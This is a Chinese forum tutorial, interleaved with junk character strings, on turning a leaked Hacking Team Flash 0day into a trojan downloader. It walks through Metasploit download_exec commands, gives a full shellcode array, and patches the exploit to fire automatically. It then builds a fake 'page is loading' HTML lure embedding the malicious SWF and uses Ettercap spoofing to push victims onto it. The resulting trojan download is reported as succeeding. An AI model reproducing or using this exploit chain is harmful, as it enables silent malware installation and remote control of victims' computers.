4 b0 c4 I) ?& s* M3 K
三、flash 0day之手工代码修改制作下载者实例入侵演示 + o3 u) T6 `# Y6 n% o5 V# `. v
/ F! s) Z0 v( a! a+ ~$ n- K
( a8 `( h: ^9 w$ W# Q* X. P0 t6 ` 利用到的工具:
6 N/ P: i% v3 y2 N8 Z6 l' h # N3 j& i4 O6 o' K3 l
6 c! J% K* l1 Z: _) v- E
Msf
9 @1 ^, f& d0 }5 M/ A$ p 1 t; w% x0 g. D3 Q. z- d6 }
- Q5 o3 Q! K! Q3 F9 e- g, W Ettercap + u7 z4 E/ s. k2 a8 |
& k* ~ K: c) T, V
8 g0 K7 T. Q' M' r# j
Adobe Flash CS6
0 F, \8 y( N& }" K1 U% r 0 P2 D S3 }+ d3 N
8 a) D+ b( u& `; w, J Hacking Team Flash 0day-可冲破Chrome沙盒-Evil0X源代码一份
/ Q" n- l/ v# \3 Q
$ V8 j9 W4 l+ L2 {7 A. i' `% ^* w# S8 n! q3 L% O# t6 H. }
下面我们就开始演示入侵,利用msf生成shellcode,首先打开msf执行use windows/download_exec,show options
. t( K3 _$ m) x1 n. G
; {( m' ^! |' \& o
# C# Q. j, E& l) n$ Q3 T* ?9 @ 如图:
6 \7 C, C. N2 @- G% v9 I
! ~9 k+ n9 C" q9 g: V" k. X( o. f
0 e' W, e1 {2 J4 U0 v: ^6 \9 j8 D 5 t- a$ N7 `+ V2 u# |: d
( Q& m1 ` s9 ~1 g" l1 V
1 w- S4 ?% ~& u 6 c( Q, B! F' K& ^7 @5 N" x
" e4 Q/ f, _3 B( P8 a( `. t S1 J& ]: ~ 然后set EXE system.exe,再执行set URL,需要说明一下URL就是我们的马的下载地址,这里我们用远控马,远控配置使用不再详细说明。。。如图:
3 m% h* t0 @3 `+ w. Y 0 u$ [0 c( E- X& P, K
5 B& R" [( L& o
1 g0 D/ Z8 Y2 W, f- h) J6 e( m 6 B% p; }. D3 z5 T, s
# o# c, y3 X: g
9 ~; A# m8 {2 {* b9 x2 Y* K7 g ; r4 o+ s* B4 P+ P* y
+ c! k6 \4 Q7 `! F. m. a
然后执行generate -t dword生成shellcode,如下: 1 O) Y+ b8 v9 B R% ^ \! J
5 X8 Z' h# z' w
' C, d; e | s8 c0 H: L6 @7 B- ?
; U4 X! h- m. ^' O+ I6 \ ( W' h3 H& C0 {& B) k; G: c; M
( H& x9 l* V! ?6 X6 I1 d 复制代码到文本下便于我们一会编辑flash exp,如下:
. g$ H, ^6 V' l9 e
* f( _3 f. W# R b3 i1 A8 e
4 k( B# d9 B: n5 C 0x0089e8fc, 0x89600000, 0x64d231e5, 0x8b30528b, 0x528b0c52, 0x28728b14, 0x264ab70f, 0xc031ff31, 8 @+ Z8 L- q" `% Y9 a3 D! s9 W5 Q
; j- i) g' a: B8 M# a) X
% t; [+ D6 I) `, v' ?; N; v, k 0x7c613cac, 0xc1202c02, 0xc7010dcf, 0x5752f0e2, 0x8b10528b, 0xd0013c42, 0x8578408b, 0x014a74c0, ' x8 E1 B4 U- \
0 ^" u7 Y9 K: Z' B3 ~" V
) }" b# o8 V1 {' s, _" A h! L! K 0x488b50d0, 0x20588b18, 0x3ce3d301, 0x8b348b49, 0xff31d601, 0xc1acc031, 0xc7010dcf, 0xf475e038,
7 ~# e$ I- M5 m# N9 y [ % k6 k: \) Q4 o; K, v' r
/ Q" F* H* K) r' y O, c
0x3bf87d03, 0xe275247d, 0x24588b58, 0x8b66d301, 0x588b4b0c, 0x8bd3011c, 0xd0018b04, 0x24244489, 0 m+ j! p! H) u! C% a
& k" d; _0 m& E8 w
+ z; }3 Z- Q8 e% l4 p
0x59615b5b, 0xe0ff515a, 0x8b5a5f58, 0x5d86eb12, 0x74656e68, 0x69776800, 0xe689696e, 0x774c6854,
; a# W1 _6 n3 h& n; s
6 @ e0 E. c. ?% `* n' [4 h4 e3 e w- p+ j4 L* G4 u
0xd5ff0726, 0x5757ff31, 0x68565757, 0xa779563a, 0x60ebd5ff, 0x51c9315b, 0x51036a51, 0x53506a51,
7 S4 s$ ~" x7 w4 I- j$ ~
" l+ b6 _; a C5 e8 ^3 F
: J" f) E( ]# U: [' I- o1 T6 l 0x89576850, 0xd5ffc69f, 0x31594feb, 0x006852d2, 0x52846032, 0x52515252, 0x55eb6850, 0xd5ff3b2e,
$ e. L- c# x6 U
4 q# d" g' X9 m Y2 S- ^
* Y; i8 L# ^" O% V9 f; R 0x106ac689, 0x3380685b, 0xe0890000, 0x6a50046a, 0x7568561f, 0xff869e46, 0x57ff31d5, 0x56575757, , L1 d. t2 f0 \: P
7 D$ A* A% z' i" }! M2 a
{$ C% R8 @/ ?" y 0x18062d68, 0x85d5ff7b, 0x4b1f75c0, 0x007c840f, 0xd1eb0000, 0x00008ee9, 0xfface800, 0x732fffff,
2 ]6 b) n* L8 f. ^; o 7 X6 [# @4 M, d
+ ^4 F9 V; l$ V3 C1 n& c/ Q- d; c
0x65747379, 0x78652e6d, 0x6beb0065, 0x505fc031, 0x026a026a, 0x6a026a50, 0xda685702, 0xff4fdaf6,
1 A7 f! u. c0 Q# ?# N8 x
7 [5 n! _; V0 Y+ g
- h3 x6 L0 f" D2 r 0xc03193d5, 0x0304b866, 0x8d54c429, 0x3108244c, 0x5003b4c0, 0x12685651, 0xffe28996, 0x74c085d5,
$ R9 g: b ?5 L
$ j8 |7 i4 w0 P, C/ t" }3 [, y* ?
/ x8 |# M, n3 w, \7 W 0xc085582d, 0x006a1674, 0x448d5054, 0x53500c24, 0xae572d68, 0x83d5ff5b, 0xceeb04ec, 0x96c66853,
" U& B3 R3 [5 l u$ F1 q& W ' M6 m$ M' G' Q' Y4 z. l
, R' |% X" d/ `8 q, l
0xd5ff5287, 0x6857006a, 0x876f8b31, 0x006ad5ff, 0xa2b5f068, 0xe8d5ff56, 0xffffff90, 0x74737973, + i$ D. u* t5 T7 m/ `
9 ^: _& F/ A# k: d" I
( k$ O+ B7 U$ o& c/ [; P- L 0x652e6d65, 0xe8006578, 0xffffff08, 0x2e737378, 0x64696162, 0x6b682e6f, 0x00000000 * R% h9 Y) h- b# z' B9 b$ C
) J6 _0 q( E- d
$ e0 b& y# C, y 9 m! `" O. ]' n* u
1 N0 v2 F) {6 } b" O( n; L' ]
) c) y" B, x2 K& v1 U' _# \ $ [( n7 V+ G0 F7 n6 q; }- o% v
C0 o- x G' t7 ~
/ y5 B% t1 Z) p% w: M 下面我们来修改flash 0day exp,需要修改三个文件,分别为:
" G" \4 F3 `! M& a0 i9 f 8 x0 _. f, R' }# x% S2 v- q
0 j# O3 E0 y- f . P) \1 g! b4 d1 a3 g+ `
8 f& o4 Q, x# X3 G3 }
* } ?7 y) b, _5 s( } 先修改ShellWin32.as,部分源代码如图: + z2 [) t: r" f) V, i$ q2 Y
, C! V" J8 Y% h# N
- u+ g8 ^1 ~/ O/ ` % \& f5 \4 I0 W! M9 ~. M
- D' C$ R3 z9 ]1 f/ ?5 g8 Z( D% A5 @$ Y9 A$ {
我们需要把标记处[]中的代码改成用msf生成的代码,修改后如下: 5 ?' l* m+ m/ E& n5 d& {6 {
6 W0 D `, q' h/ b
- D* u8 W7 \7 L: N0 f; \; j
, z$ j* c9 B. ?5 D
/ a( q Q! Q/ W# Q+ ^# W, ^' D+ d6 Q' g. I
然后保存,ShellWin64.as的修改方法如上述,不再演示,下面我们来修改myclass.as,这里需要说明一下,因为此exp生成的利用程序,不能直接自动触发flash漏洞,也就是需要点击按钮才可以,实际上在做渗透的时候需要把它搞得更完美,所以就需要修改,修改方法:搜索myclass的某个字符doc.addchild(btn);如图:
# `" d. e9 i" A e6 ^" i4 V
; q2 t! P0 V" W' V5 I
# V3 [, j/ @4 R! V5 ^
# f( {0 w$ J. P! c- r* n
i9 k& V& C$ b& p6 b2 o! v) l0 q" \2 b. c: l3 j
换行在后面加一句TryExpl();注意是l不是数字1,然后如图:
; P. W# b) ^! N 6 U+ P/ b* t8 T& Z
( U& M' d% q3 ^: A& \
0 e% ? t! ~' N! i, v# S! K
- E7 x$ m# ~# w% x8 Y1 Z, D& G7 f6 I/ N
1 T# y$ l/ y. Z0 U2 h* T- Y" }
4 B' L/ M' v! b8 @
2 A( M7 y( i5 _# M & c" p- m) G$ E# A" [7 z" R* u
$ ^0 I c1 _. v2 B e. c
6 E1 A7 O; L, B7 T 然后点保存,下面我们来编译一下,打开 ) z: H, r8 `$ z7 q( f7 _# q
$ z0 B; f p2 ?% f* P6 S( E# Z4 x2 p _* \# ^2 a5 H
exp1.fla然后点文件-发布,看看编译没错误
, a, C3 k9 L; v9 G & _; B/ ?4 t( ~. c4 g* K
3 r7 q/ F' X- G. n: Y
$ S: U- @* e1 R2 e/ O
# W9 X+ @# v! ~9 z. C" F
% x C& Q+ B+ \
. w1 u5 r$ i6 { 7 T; G3 I* Y" k) z) v9 C) e1 A4 m
. ~8 B: g$ {; d6 F & Y) A: i/ G `5 a$ h
! E% r5 R3 ]# M0 Z( k
$ G: E8 p0 @" A( o: F7 V3 S+ I
5 R4 }3 Q8 r5 y' b$ j
J% M$ A0 X% p7 U/ g2 e P+ ^8 d4 w5 Q8 c2 }* b8 |
然后我们把生成的
' ]! \' l; v# `" L x , |1 X, X/ I& k; Z, x0 `
5 Z3 w" C2 }& \, V( q9 T
exp1.swf丢到kailinux 的/var/www/html下: 2 o' }4 ~+ J! d$ {4 J/ c
c+ @7 I+ @- ?$ s( b/ J* z0 u
3 Y0 I8 K$ f2 r) J$ ?) d 然后把这段代码好好编辑一下
{# J- C1 w! _( c- r( z& ]
. ? q) G/ ?- z; Z% M
- Q5 ?1 i: d+ o& W) u3 A
8 _: Z5 F v! E: i) g( t8 N; z8 [& R
& w+ ]- u8 m8 L& c
@% e& Q" v4 M- Y' _9 t& _3 x ' ]* [( o' f6 Z4 S* Z8 O
K' E0 {' K8 v7 n
5 _' |) j Y/ X7 Q8 P
2 V$ D1 H% X- N) p' O {
& T, b% h+ h5 }+ Z8 x
+ w: v5 m- q9 j5 y8 ~% Y
1 |# H8 a$ Z0 l) @8 R - v) ~7 Q) P) p
" q1 f; r, p$ ~& l& Z M# t
0 ~& `5 ?5 R+ P( z
3 A2 J6 S9 H8 m) |* ?" A; g0 Q8 p" l4 c' D8 J# D0 O
9 ^& G$ d* h( s' \' A
# Q! J. d0 ~: p; ]0 [6 R4 f/ ~, [- @( C+ y% g9 P& i: Z
<!DOCTYPE html> ) ^7 Z1 r$ W) ?2 J; u6 _0 R
6 ^9 v/ D% h4 b* I* e
* Q" ^$ Q9 r- H, D1 m% V <html> , \% G4 U$ N; R$ F- j
, M' M" H1 O- c9 k
( ^! z- X) m. c p4 X- e
<head>
; J3 T) H% x6 P& d! p; k& L- d : q# W, e6 ]! Y+ a- {$ ]
/ @3 h: b0 b9 f& Y& J8 ]; u
<meta http-equiv="Content-Type" content="text/html; ; @# ]) ~' G$ x8 ]' L2 {
* T. W" a6 y6 V5 v8 A Z0 A. b6 r
0 w" \4 ?. L; t# s3 j4 u6 i# `
charset=utf-8"/> 4 `6 Y8 R7 W [3 M' R
+ w3 D* C6 g' u8 h/ v: @4 s! e# j+ C0 e' ~
</head> % i) s# V9 \: Z" E& z
: c# u- X6 r1 u0 H& X/ b6 a' a+ J) w
6 V# s, f3 U0 U/ v0 r
<body> 0 K7 _' e( k- W" {: K
9 R6 T3 g' L+ F0 j8 x. x
y" S6 d6 g4 M. G& g+ `% s <h2> Please wait, the requested page is loading...</h2>
3 J3 b3 F9 k2 ~0 t' v* O2 r5 {
( ]3 o5 _1 i/ }! J# D; a8 T
% _+ F8 i5 D* [+ ~/ W& O <br> , O9 s/ o$ O; p, T
( E' w( x. D# T. Q; a, I7 Z3 n9 e) v! L! I) l( j/ p+ O) O9 o
<OBJECT
& u! J) F# H0 \6 G- Y / C q% M- E3 `( h- e& g# l# t
/ A& o/ e) M1 L, N, |
classid="clsid 27CDB6E-AE6D-11cf-96B8-444553540000" WIDTH="50" HEIGHT="50" id="4">< ARAM NAME=movie
. w: b% d: R6 @$ |
7 d% M. ^+ V, s1 s0 H! I, B) L
5 H3 K3 N! j6 o- j! N. G! s VALUE="http://192.168.0.109/exp1.swf"></OBJECT>
' y) } G& o! b/ I' `% D% s: C" c
: t) k' q D# ~: B
4 A+ h/ L% h# X </body> 4 x) B: N# [0 _1 c7 m
* S' W7 b4 v# t) x" V2 f
( ]1 B- C, Y: P( Z <script>
, h1 q/ u. T1 w
* b% R' [+ c+ M5 U. Z4 \+ ]) ~: o/ D; ?3 N% b8 S- o
setTimeout(function () { / @! q; I9 [7 p0 ]' ?
5 D4 h R4 X0 M) \
0 D6 x4 f9 a! ^5 m; l m
0 g7 e4 y& k6 A- ]2 g$ G6 C* _8 N
' m, I) [ p4 {/ F" a/ o) b3 n0 T- j% C' Z# V# Q6 F0 r
window.location.reload();
5 b; T Q, k! ]- E& ~6 b # g4 q! \ r% c- j* G: @& a4 C4 _
8 l- h! ]/ V9 n) } }, 10000); : @. e+ B* S; I! g
# q( n6 A4 ?" u; t4 c8 s" D) l8 T
# Z6 O* `" J. X! y6 w- l% k, E4 } 5 r o, U9 C. \! b" i
" G1 \: W2 k) K2 }. C
% Y8 U, X; H# z- I T# j' I# I0 { </script>
; X: i, w. {0 s% z N( \" [ 4 U6 `5 {8 o! x1 X
/ ?" {4 T3 e! I! y </html> 9 C( d+ U& s' ?3 s+ k4 v
: y% H- y Q$ K7 N# f- ~* k" [0 h6 F' q
5 ^& N9 z" B) C9 M
) _$ _4 I0 T' ~) p$ v5 s
6 g- \( h3 ~, o- A% Z1 f3 @
* x$ I {5 P) V8 o8 Q ] 注意:192.168.0.109是kali的ip地址,这时候我们需要service apache2 start启动一下web服务,然后将上面的html保存为index.htm同样丢到kali web目录下,测试访问链接存在如图: / y( B) ` V/ e! R
C. U% d# U. [) ^: }
* Q( P2 |( m7 E, a8 o( y) } ) {2 Q8 b1 @9 s. h
/ S& l6 B: ~1 E6 |
; q" c0 I: L h7 ?- H
# X3 q+ H( C" O; U, c8 l , f& ]/ o4 ~; c; Q# b W
, _0 b. V0 [% ~( V( Z# j
0 c6 V* [2 I# B6 u 3 Q9 b! F, J0 N
) h6 a6 K7 T' T ~+ u$ W% R
# Y. Q0 O! X9 ]0 r/ L
1 G! }- H" S8 @2 J
/ n! U( |6 Z+ y. y( @& o
+ d; l# v. I; R( D6 Y& }" F# h
1 B; u, A5 l7 ]) c: ~' T4 a
- Q& y& ?1 R0 h. z g& i- } 下面我们用ettercap欺骗如图: 9 E+ ~& e! C" g2 u
1 V7 Z! O4 f7 y5 `( X
' U( F' ?" ?) n. x" e, S* x" ^ ' U7 @. d+ i0 B+ [2 v" Z# K
4 z9 P" ~7 ^( h- I# Z. I6 ]! o
, I7 K7 D: g" w* o1 B
9 K4 m5 D7 d) m( |+ x" U
4 c2 g: s9 P8 X- t5 a3 p+ Z" d* R& J7 [
下面我们随便访问个网站看看: 4 N {( j) B5 K' u& Q$ O
% x/ M, } `& w ]/ f+ x; t$ I, Q
6 a; s6 w- p: N! K 我靠我发现直接用ettercap欺骗物理机装了腾讯管家照样可以欺骗成功,如图: n! D9 d* ?+ A. g3 s1 y- _
! P! D1 _$ j- [) u2 y
* j0 ]+ S9 a: m& s
' M9 d7 l. S9 S ' f, R0 C& x( \" d
3 \6 u1 A3 w. }2 [ 我们看另一台,
4 \3 U/ \: e$ Y
1 X8 I- _$ C8 _$ e r
& E- y7 i5 {7 l: `2 C$ v( N& m 提示这个错误,说明木马是成功被下载执行了, 只是由于某些原因没上线而已。。。
& R% \/ P- u, H6 o# [* U |